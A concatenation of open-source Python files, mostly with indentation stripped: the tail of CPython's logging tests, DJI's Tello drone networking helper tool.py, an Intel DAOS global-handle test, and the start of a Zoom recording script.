sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
            #Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist")
self.rmfiles.append(filename)
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".1")
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".2")
self.assertFalse(os.path.exists(self.fn + ".3"))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# test methods added below
pass
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
import time
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
FormatterTest,
LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest,
RotatingFileHandlerTest,
LastResortTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
tool.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import traceback
import netifaces
import netaddr
from netaddr import IPNetwork
import socket
import queue
import threading
from . import logger
def get_func_name():
"""
Get the name of the calling function
:return: calling-function`s name
"""
return traceback.extract_stack()[-2][2]
def get_robots_sn(robots_list):
"""
    Get the sn for each robot in robots_list
    :param robots_list: robots whose sn is needed
:return: robots_sn_dict = {sn:robot_obj, ...}
"""
robots_sn_dict = {}
for robot_obj in robots_list:
sn = robot_obj.get_sn()
robots_sn_dict[sn] = robot_obj
return robots_sn_dict
def check_robot_id(robot_id, robots_dict):
"""
check to see if the robot id exists
:param robot_id:
:param robots_dict: the dict to search
:return:
"""
return robot_id in list(robots_dict.keys())
def check_robots_id(robots_id_list, robots_dict):
"""
check to see if the robots id in input list exist
:param robots_id_list:
:param robots_dict: the dict to search
    :return: (False, robot_id) if a robot id does not exist
    :return: (True, -1) if all robot ids exist
"""
for robot_id in robots_id_list:
if not check_robot_id(robot_id, robots_dict):
return False, robot_id
return True, -1
def check_group_host(robot_group_host_list):
if len(robot_group_host_list) == 0:
logger.warning("‘run’ obj should have at least 1 param to run")
return True
    total_length = 0
    _first_set = set(robot_group_host_list[0])
    for robot_group_host in robot_group_host_list:
        _first_set = _first_set.union(set(robot_group_host))
        total_length += len(robot_group_host)
    return len(_first_set) == total_length
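# A minimal usage sketch (hypothetical host tuples) for check_group_host: it returns True only
# when the union of all group host lists has as many entries as the lists combined, i.e. no
# host is assigned to more than one group and no group contains duplicates.
#
#   check_group_host([[("192.168.1.10", 8889)], [("192.168.1.11", 8889)]])   # True
#   check_group_host([[("192.168.1.10", 8889)], [("192.168.1.10", 8889)]])   # False, shared host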
def get_subnets():
"""
    Look through the machine's network interfaces and
    return the subnet addresses and the server's ip addresses
:return: list[str]: subnets
list[str]: addr_list
"""
subnets = []
ifaces = netifaces.interfaces()
addr_list = []
for myiface in ifaces:
addrs = netifaces.ifaddresses(myiface)
if socket.AF_INET not in addrs:
continue
# Get ipv4 stuff
ipinfo = addrs[socket.AF_INET][0]
address = ipinfo['addr']
netmask = ipinfo['netmask']
# limit range of search. This will work for router subnets
if netmask != '255.255.255.0':
continue
        # Create an IPNetwork object and get the network address
cidr = netaddr.IPNetwork('%s/%s' % (address, netmask))
network = cidr.network
subnets.append((network, netmask))
addr_list.append(address)
return subnets, addr_list
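# A minimal usage sketch for get_subnets(); it only considers interfaces with a 255.255.255.0
# netmask, so the assumption here is that at least one such IPv4 interface is up. The printed
# values are illustrative only.
#
#   subnets, local_addrs = get_subnets()
#   for network, netmask in subnets:
#       print("scan %s/%s, local addresses: %s" % (network, netmask, local_addrs))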
class TelloProtocol(object):
def __init__(self, text=None, host=None, encoding='utf-8'):
self._text = text
self._host = host
self.encoding = encoding
self.init()
def init(self):
if self._text is None:
logger.warning("Connection: recv buff None.")
return
if isinstance(self._text, bytes):
            if self._text in (b'\xcc', b'\xff'):
                logger.warning("decode_msg: recv invalid data, buff {0}".format(self._text))
                # the drone has a bug where it replies with the error byte 0xcc; 43907 has a bug where it replies with 0xff
self._text = None
return
else:
self._text = self._decode()
elif isinstance(self._text, str):
self._text = self._encode()
@property
def text(self):
return self._text
@property
def host(self):
return self._host
@host.setter
def host(self, value):
self._host = value
@text.setter
def text(self, value):
self._text = value
def _encode(self):
return self._text.encode(self.encoding)
def _decode(self):
return self._text.decode(self.encoding)
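# A minimal round-trip sketch for TelloProtocol (the host tuple below is hypothetical): a str
# payload is encoded to bytes for sending, a bytes payload received from the socket is decoded
# back to str, and invalid single-byte 0xcc/0xff replies are dropped in init().
#
#   outgoing = TelloProtocol("command", ("192.168.10.1", 8889))   # .text -> b'command'
#   incoming = TelloProtocol(b"ok", ("192.168.10.1", 8889))       # .text -> 'ok'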
class TelloConnection(object):
def __init__(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=8889):
self.local_ip = local_ip
self.local_port = local_port
self._sock = None
self.client_recieve_thread_flag = False # for client recieve
self._robot_host_list = [] # for scan robot
def start(self):
try:
local_addr = (self.local_ip, self.local_port)
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for sending cmd
self._sock.bind(local_addr)
except Exception as e:
logger.warning("udpConnection: create, host_addr:{0}, exception:{1}".format(self.local_ip, e))
raise
def pre_close(self):
if len(self._robot_host_list) > 0:
for host in self._robot_host_list:
self.send(TelloProtocol("command", host))
else:
logger.warning("no exit host")
def close(self):
if self._sock:
self.pre_close() # send command to shut down recv
time.sleep(1)
self._sock.close()
def recv(self):
try:
if self._sock:
data, host = self._sock.recvfrom(2048)
else:
raise Exception("socket used before assign")
except Exception as e:
logger.warning("Connection: recv, exception:{0}".format(e))
raise
proto = TelloProtocol(data, host)
return proto
def send(self, proto):
try:
if self._sock:
self._sock.sendto(proto.text, proto.host)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
def _scan_host(self, num):
"""Find avaliable ip list in server's subnets
:param num: Number of Tello this method is expected to find
:return: None
"""
logger.info('[Start_Searching]Searching for %s available Tello...\n' % num)
subnets, address = get_subnets()
possible_addr = []
for subnet, netmask in subnets:
for ip in IPNetwork('%s/%s' % (subnet, netmask)):
# skip local and broadcast
if str(ip).split('.')[3] == '0' or str(ip).split('.')[3] == '255':
continue
possible_addr.append(str(ip))
while len(self._robot_host_list) < num:
logger.info('[Still_Searching]Trying to find Tello in subnets...\n')
            # remove already found Tello ips
for tello_host in self._robot_host_list:
if tello_host[0] in possible_addr:
possible_addr.remove(tello_host[0])
# skip server itself
for ip in possible_addr:
if ip in address:
continue
self._sock.sendto(b'command', (ip, self.local_port))
if len(self._robot_host_list) >= num:
break
return self._robot_host_list
def scan_multi_robot(self, num=0):
""" Automatic scanning of robots in the network
:param num:
:return:
"""
receive_thread = threading.Thread(target=self._scan_receive_task, args=(num, ), daemon=True)
receive_thread.start()
robot_host_list = self._scan_host(num)
receive_thread.join()
return robot_host_list
def _scan_receive_task(self, num):
"""Listen to responses from the Tello when scan the devices.
:param:num:
"""
while len(self._robot_host_list) < num:
try:
resp, ip = self._sock.recvfrom(1024)
logger.info("FoundTello: from ip {1}_receive_task, recv msg: {0}".format(resp, ip))
ip = ''.join(str(ip[0]))
if resp.upper() == b'OK' and ip not in self._robot_host_list:
                    logger.info('FoundTello: Found Tello. The Tello ip is: %s\n' % ip)
self._robot_host_list.append((ip, self.local_port))
except socket.error as exc:
logger.error("[Exception_Error]Caught exception socket.error : {0}\n".format(exc))
self.client_recieve_thread_flag = True
logger.info("FoundTello: has finished, _scan_receive_task quit!")
class TelloClient(object):
def __init__(self):
self._conn = TelloConnection()
self.queue = queue.Queue()
self.receive_thread = threading.Thread(target=self.recv, daemon=True)
self.receive_thread_flag = True
def start(self):
self._conn.start()
self.receive_thread.start()
def close(self):
self.receive_thread_flag = False
self._conn.client_recieve_thread_flag = True
if self._conn:
self._conn.close()
self.receive_thread.join(10)
def recv(self):
while not self._conn.client_recieve_thread_flag:
pass
logger.info("recv thread start!")
while self.receive_thread_flag:
proto = self._conn.recv()
self.queue.put(proto)
logger.info("recv thread quit!")
def send(self, proto):
self._conn.send(proto)
def scan_multi_robot(self, num):
return self._conn.scan_multi_robot(num)
class TelloStatus(object):
FLIGHT_ACTION_SET = {"error", "ok", 'out of range', "error No valid marker", "error Not joystick",
"error Auto Land", "error No valid imu", "error, high temp", "error Motor stop"}
EXT_ACTION_SET = {"led ok", "matrix ok", 'unknow command: led', "unknow command: mled", "command error: 254"}
def __init__(self, cur_action):
self.cur_action = cur_action
@staticmethod
def judge(proto):
data = proto.text
host = proto.host
if data is None:
if host is None:
logger.waring("socket closed")
else:
_last_two_words = data.strip()[-2:]
if _last_two_words != "ok":
                # check whether the reply ends with 'ok' or with a numeric battery value
try:
float(_last_two_words) # battery obj
except ValueError:
logger.warning("reply false: {}".format(data))
else:
logger.debug("DRONE reply:{}".format(data))
class TelloThread(threading.Thread):
def __init__(self, target, *args, **kwargs):
threading.Thread.__init__(self)
self.args = args
self.kw = kwargs
self.result = None
self.target = target
def run(self):
self.result = self.target(*self.args, **self.kw)
def get_result(self):
try:
return self.result
except Exception:
return None
|
GlobalHandle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
import ctypes
import os
import time
import traceback
import sys
import json
from multiprocessing import Process, sharedctypes
from avocado import Test
sys.path.append('./util')
sys.path.append('../util')
sys.path.append('../../../utils/py')
sys.path.append('./../../utils/py')
import ServerUtils
import WriteHostFile
import CheckForPool
import daos_api
import daos_cref
from daos_api import DaosContext
from daos_api import DaosPool
from daos_api import DaosContainer
from daos_cref import *
def CheckHandle(pool_glob_handle, uuidstr, cont_glob_handle, rank):
"""
    This gets run in a child process and verifies the global
handles can be turned into local handles in another process.
"""
try:
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
build_paths = json.load(f)
# setup the DAOS python API in this process
context = DaosContext(build_paths['PREFIX'] + '/lib/')
# setup the pool and connect using global handle
pool = DaosPool(context)
pool.uuid = uuidstr
pool.set_svc(rank)
pool.group = "daos_server"
buf = ctypes.cast(pool_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte * pool_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
pool_handle = pool.global2local(context,
pool_glob_handle.iov_len,
pool_glob_handle.iov_buf_len,
buf2)
# perform an operation that will use the new handle, if it
# doesn't throw an exception, then all is well.
pool.pool_query()
# setup the container and then connect using the global handle
container = DaosContainer(context)
container.poh = pool_handle
buf = ctypes.cast(cont_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
cont_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
cont_handle = container.global2local(context,
cont_glob_handle.iov_len,
cont_glob_handle.iov_buf_len,
buf2)
# just try one thing to make sure handle is good
container.query()
except ValueError as e:
print(e)
print(traceback.format_exc())
raise
return
class GlobalHandle(Test):
"""
This class contains tests to verify the ability to share container
    handles among processes.
"""
def setUp(self):
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
self.build_paths = json.load(f)
# setup the DAOS python API
self.Context = DaosContext(self.build_paths['PREFIX'] + '/lib/')
server_group = self.params.get("server_group",'/server/',
'daos_server')
basepath = os.path.normpath(self.build_paths['PREFIX'] + "/../")
tmp = self.build_paths['PREFIX'] + '/tmp'
self.hostlist = self.params.get("test_machines",'/run/hosts/')
self.hostfile = WriteHostFile.WriteHostFile(self.hostlist, tmp)
ServerUtils.runServer(self.hostfile, server_group, basepath)
time.sleep(2)
def tearDown(self):
ServerUtils.stopServer()
os.remove(self.hostfile)
# really make sure everything is gone
CheckForPool.CleanupPools(self.hostlist)
ServerUtils.killServer(self.hostlist)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=container,conthandle,vm,small,regression
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode",'/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size",'/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
pool = DaosPool(self.Context)
pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
pool.connect(1 << 1)
# create a pool global handle
iov_len, buf_len, buf = pool.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_pool_handle = sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len,
iov_len)
# create a container
container = DaosContainer(self.Context)
container.create(pool.handle)
container.open()
# create a container global handle
iov_len, buf_len, buf = container.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_cont_handle = sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len,
iov_len)
sct_pool_uuid = sharedctypes.RawArray(ctypes.c_byte, pool.uuid)
# this should work in the future but need on-line server addition
#arg_list = (
#p = Process(target=CheckHandle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
CheckHandle(sct_pool_handle, sct_pool_uuid, sct_cont_handle, 0)
except ValueError as e:
print(e)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
zoomrec.py
|
import csv
import logging
import os
import psutil
import pyautogui
import random
import schedule
import signal
import subprocess
import threading
import time
import atexit
from datetime import datetime, timedelta
import requests
global ONGOING_MEETING
global VIDEO_PANEL_HIDED
global TELEGRAM_TOKEN
global TELEGRAM_RETRIES
global TELEGRAM_CHAT_ID
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
# Turn DEBUG on:
# - screenshot on error
# - record joining
# - do not exit container on error
DEBUG = True if os.getenv('DEBUG') == 'True' else False
# Disable failsafe
pyautogui.FAILSAFE = False
# Get vars
